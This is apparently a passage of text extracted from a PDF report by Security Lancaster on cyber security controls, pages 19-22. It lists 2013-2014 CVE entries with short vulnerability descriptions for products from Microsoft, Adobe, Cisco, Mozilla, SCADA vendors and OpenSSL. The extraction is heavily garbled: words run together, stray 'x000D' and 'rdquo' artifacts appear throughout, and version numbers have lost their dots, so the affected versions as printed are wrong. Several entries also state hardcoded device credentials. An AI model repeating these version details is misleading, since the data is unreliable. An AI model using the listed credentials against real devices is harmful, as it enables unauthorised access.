rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
